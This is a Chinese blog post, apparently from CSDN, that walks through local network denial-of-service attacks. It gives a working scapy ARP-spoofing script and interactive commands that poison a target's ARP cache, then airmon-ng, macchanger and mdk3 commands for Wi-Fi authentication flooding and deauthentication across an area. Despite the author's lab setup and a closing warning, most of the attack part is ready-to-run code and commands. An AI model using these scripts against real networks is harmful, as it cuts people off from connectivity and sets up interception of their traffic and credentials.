c++突破网关屏蔽_局部网络屏蔽

最新推荐文章于 2022-07-21 19:05:14 发布
最新推荐文章于 2022-07-21 19:05:14 发布
阅读量456 收藏 1
点赞数
文章标签: c++突破网关屏蔽

有线网络屏蔽

ARP官方释意:地址解析协议,即ARP(Address Resolution Protocol),是根据获取的一个。发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址(MAC);收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。

748a2a0676fe383470ade50cc7af166c.png

实验环境:

Linux parrot(攻击系统)

Linux centos(被攻击系统)

实验语言:python

Arp协议是网络不可缺少的一部分,由于arp协议存在一些不可修复的漏洞所以骇客也经常利用这个漏洞进行局域网攻击。攻击大致分为两种。(1)纯粹的网络攻击,迫使受害者无法使用网络 (2)目的性攻击,arp欺骗获取局域网使用者的信息,盗取账号密码等敏感信息。

笔者的电脑是接入寝室网络的,本来想使用真实电脑作为攻击目标,鉴于室友正在使用,转移到虚拟机进行实验。

搭建实验环境

d8dab039189abc553ddec45a70bfa889.png

Linux parrot(攻击系统)

05eadaa877e53fc4f080e0563ac14dad.png

Linux centos(被攻击系统)

我们可以看到终端显示的信息(网关一般是默认的)

攻击系统IP :192.168.163.146 MAC:00:0c:29:41:75:aa

被攻击者IP:192.168.163.150 MAC:00:0c:29:0b:09:89

网络测试依次使用两台机器ping百度显示信息如下

93338b9b1be6be3a740e2975c9fc7432.png
a3017c495e014b233b6e37159e944bcf.png

此信息说明可以连接外网,证明目前可以上网

使用攻击系统扫描本网段的信息,使用到的工具fping

43c25ab5bd49eeaa6858867b9a620f1c.png

扫描到目标IP使用arp -a命令确认一下信息如下:

f646a3c26506ebacd66f1dfb80057614.png

确认无误,我的局域网中网关以2结尾,所以我们展开192.168.163.2和192.

168.163.150之间的攻击。

使用python的scapy模块,编写对应的ARP包进行发送,由于scapy有独立的交互模式,我们就直接在终端中进行编程。注意这里要进入root权限

核心源代码如下:

>>> a = ARP()

>>> a.show()

###[ ARP ]###

hwtype= 0x1

ptype= IPv4

hwlen= None

plen= None

op= who-has

hwsrc= 00:0c:29:41:75:aa

psrc= 192.168.163.146

hwdst= 00:00:00:00:00:00

pdst= 0.0.0.0

>>> a.psrc = '192.168.163.2'

>>> a.pdst = '192.168.163.150'

>>> send(a,loop=1)

正在攻击目标

4433a2ef777b8466794db2020fad950a.png

验证:

28d18ddb138744e53a35a004b014b036.png

Ping百度没有反应,网关mac地址也被修改为攻击机的MAC地址

Python代码:

from scapy.all import *

import time

import random

pdst=str(input("目标IP:"))

gw=str(input("网关IP:"))

a = ARP()

a.pdst = pdst

a.psrc = gw

a.hwsrc = 'b4:1e:89:20:43:A1'

while 1:

send(a,loop =0)

time.sleep(random.uniform(10,5))

无线网络屏蔽

无线网络攻击相对上面的操作更加简单,纯工具攻击方案。首先需要一个攻击系统,我选用parrot security系统,因为这个系统整合的工具比较全,现对于kali来说虽然没有什么较大的优势但是他的UI界面做的相当的好。

插入无线网卡

a692fec1b85ce55e568d0df175cff183.png

可以看到无线网卡被命名为了wlan0(因为一般都是这样命名的),使用airmon-ng将无线网专为mon模式,在这之前最好把网卡mac地址改变一下(我也不知道有什么用总之这样改感觉谨慎一些):

ifconfig wlan0 down

Macchanger -m MAC wlan0

ifconfg wlan0 up

071785af6a34da6eaf7f3d53171dd524.png
ace93502be7ceadef68fb3e22f57ba53.png

airmon-ng start wlan0

554ab841d649a6a5c40ee285209e27b2.png

接下来就可以使用wlan0mon进行无线网的查看了,记住名字已经变成wlan0mon了

使用airodump-ng wlan0mon或者wifete

47b9cc981d877811206a00a5b3a8fae7.png

打开就立刻扫到这两个wifi,实验目标是ruijie(传说中的我打我自己,吐槽一下锐捷客户端,不能开wifi就算了连虚拟机都不能用,让计算机专业的学生怎么搭建环境,虽然我不是计算机专业)。

直接开始攻击 mdk3 wlan0mon a -i MAC -s 速率

7c77fdc36647ea183906dd857c82edca.png

从连接状况可以看出来有大量的mac地址请求建立连接,当然我的手机已经没网了,大概就是0-20秒网络变的卡顿,之后完全失去网络通讯,当然这只是一个AP的攻击想要实现一定范围的网络中断其实也就是一个命令的事。mdk3 wlan0mon d -w 白名单AP的mac -b黑名单AP的mac -c 信道。回车键敲下去后果可想而知,网卡可能会坏掉 哈哈…

这两种攻击方式有点不一样,第一个是洪水攻击利用大量的伪造mac迫使AP无法正常提供服务,第二种是直接进行解除认证。

Aircrack-ng套装是专门针对无线的一套工具,mdk3是专用的攻击工具,除了上面的案例还有许多可研究的使用方法。

总结:

两种比较常见的局域网攻击手段,单个拿出来看似确实没什么,但是两个组合在一起完全可以制造一个网络屏蔽空间,对目标造成一定的危害,虽然是局域网,但也请不要随意对他人使用,具体的防御方法在其他的文章中也有讲述,ARP攻防那篇文章有讲到如何预防ARP攻击,无线攻击预防方案只能在路由中进行设置,有些到目前为止都还没找到合适的防御方案。

weixin_39939993
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
局域网如何禁止腾讯游戏,网关(不是路由)怎样屏蔽DNF、穿越火线等游戏。...
weixin_33811539的博客
04-19 2194
腾讯游戏是腾讯四大网络平台之一,是全球领先的游戏开发和运营机构,也是国内最大的网络游戏社区。但是,很多青少年沉迷游戏,不但影响工作和学习,还会伤害身体、滋生犯罪。本文中,我将演示如何用WSG上网行为管理网关屏蔽腾讯游戏的登录。根据腾讯游戏登录协议介绍,腾讯游戏的登录主要是http方式,需要连接网站“(dlied|msdk|mdt).*\.qq\.com”(正则表达式)。如果...
traceroute在windows下的c++实现源代码
01-30
traceroute socket windows c++ 源代码原理 详细解析traceroute的工作原理和实现细节
系统安全性之防火墙技术
学习日常分享
11-08 1614
用于实现防火墙功能的技术可分为两类: (1) 包过滤技术。基于该技术所构建的防火墙简单、价廉。 (2) 代理服务技术。基于该技术所构建的防火墙安全可靠。 上述两者之间有很强的互补性,因而在Intranet上经常是同时采用这两种防火墙技术来保障网络的安全。 包过滤防火墙 1. 包过滤防火墙的基本原理 所谓“包过滤技术”是指:将一个包过滤防火墙软件置于Intranet的适当位置,通常是在路由器或服务器中,使之能对进出Intranet的所有数据包按照指定的过滤规则进行检查,仅对符合指定规则的数据包才准予通行,否则
c++突破网关屏蔽_有些地方为何需要选择屏蔽网线,屏蔽网线有何好处?
weixin_39655160的博客
11-08 178
屏蔽网线 vs 非屏蔽网线 在铜缆结构化布线系统的各个级别中,有两种主要技术型式:屏蔽以及非屏蔽布线系统。自最早的布线标准布立以来,这两种技术型式就都广泛存在于市场中。德国,澳大利亚,瑞士以及法国在最初就比较偏好屏蔽布线系统,而在世界上的其他地区,非屏蔽布线系统较为流行并很快被采用。屏蔽和非屏蔽都可以满足千兆传输的速率要求,但当传输速率上升到万兆甚至更高时,屏蔽系统支持高频传输的稳定性优势则变得非...
用VC在局域网实现IP多播通信
Mobidogs Blog
01-18 2789
在局域网中,管理员常常需要将某条信息发送给一组用户。如果使用一对一的发送方法,虽然是可行的,但是过于麻烦,也常会出现漏发、错发。为了更有效的解决这种组通信问题,出现了一种多播技术(也常称为组播通信),它是基于IP层的通信技术。为了帮助读者理解,下面将简要的介绍一下多播的概念。  众所周知,普通IP通信是在一个发送者和一个接收者之间进行的,我们常把它称为点对点的通信,但对于有些应用,这种点对点的通信
拦截ip包C++
07-29 2798
拦截ip包C++2009年03月25日 星期三 下午 10:36<br />#include <iostream> <br />#include <winsock2.h> <br />#include <ws2tcpip.h> <br />#include <fstream><br />#include <windows.h> <br />#pragma comment(lib,"ws2_32.lib") //指定连接到网络应用和internet<br />#define IO_RCVALL _WSAIOW
dll.rar_c++快捷屏蔽_c++快捷屏蔽键_dll怎样屏蔽
09-24
C++实现DLL快速屏蔽Ctrl+Alt+Del组合键详解》 在计算机编程领域,有时我们需要对特定的系统功能进行控制,例如屏蔽某些快捷键,以达到特定的安全或管理目的。本篇将深入探讨如何使用C++编程语言,创建一个动态...
c++ hook实现屏蔽键盘win,fn,右键按键
06-03
在本主题中,我们关注的是C++中使用Hook来屏蔽键盘上的特定按键,如Win键、Fn键以及鼠标右键。我们将探讨如何在Visual Studio 2013环境下实现这一功能。 首先,我们需要了解Windows API中的键盘钩子(Keyboard Hook...
hendle.rar_网络编程_C++_
08-09
标题 "hendle.rar_网络编程_C++_" 暗示了这个压缩包包含的项目是关于使用C++进行网络编程的。描述中的"自动交换网关"则提示我们,这个程序可能涉及到网络数据包的自动路由或者交换,可能是为了实现网络设备之间的...
huoqutcpip.zip_网络编程_Visual_C++_
08-11
本资源"huoqutcpip.zip"显然关注的是如何使用C语言在Visual C++环境中实现TCP/IP地址的获取和网络连通性的检测。下面将详细探讨这些关键知识点。 1. TCP/IP协议栈: TCP/IP协议栈(Transmission Control Protocol/...
vc++实现简单路由器功能
07-22
简单实现路由器功能的小程序 供参考 不足请批评指正
c++路由器设置工具,支持多款路由器
11-21
路由器设置工具
LEACH算法 c++实现
08-01
这是一个用c++实现的无线传感器网络中较早的一个路由协议LEACH协议,有较高的参考价值,同时为相干程序该进提供重要参考
c++ QT 屏蔽 系统按键 需要管理员权限
05-27
本主题主要关注如何使用C++和QT库来实现这个功能,特别是如何处理需要管理员权限才能屏蔽的系统按键,如Ctrl+Alt+Delete。 首先,我们要明白,`Ctrl+Alt+Delete`键组合是Windows操作系统中的一个特殊组合,它触发了...
拦截网络数据的小玩意
08-16 1279
作 者: 默数悲伤时 间: 2006-09-22,00:23链 接: http://bbs.pediy.com/showthread.php?threadid=32277以前写的个小程序,暂时就命名为HookSend.EXE,看这个名字,大家就知道这个工具的功能了.主要就是列出系统中所有加载了ws2_32.dll的进程,在进程空间中释放一个拦截函数(大部分功能都在这个释放的函数之中).然后修改Se
伪造IP包,禁止TCP连接
11-15 1728
大家是否想过在局域网内如何禁止别人访问web server,pop3,ftp等。那么如何禁止呢?大家都知道TCP是面向连接的,连接时有三次握手,之后才能确认连接成功。那么我们就应该能在第一次握手之后伪造一个服务方的握手返回,从而达到TCP连接不成功,无法访问某端口。程序如下: void DeCodeIP(buf,iBufSize) //解析侦听到的IP数据包{IPHEADER * pIPhdr;T
VC++实现禁止上网
weixin_30239339的博客
08-15 487
 1、使用windows Hook,监视IE或其他浏览器的地址栏,发现有www或http字样的,则更改这些url,使之不能访问相应的url。这种方法实现可能相对容易,但是不准确,不能限制所有的上网软件。糊弄未成年小孩可能比较有效。  2、基于SPI的数据包过滤。通过编写自己的Winsock服务提供者(SPI),过滤掉不符合规则的包,如过滤访问Internet的数据包。下面会详述此方法。  3、...
c++恶搞程序,快速戒网!
m0_71235715的博客
07-21 593
c++恶搞程序,快速戒网!
C++ __FUNCTION__
最新发布
11-15
C++中,__FUNCTION__是一个预定义的宏,用于返回当前函数的名称作为一个字符串常量。它可以用于调试和错误处理,以便在程序崩溃时确定程序中的错误位置。以下是一个简单的例子,演示如何使用__FUNCTION__宏: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值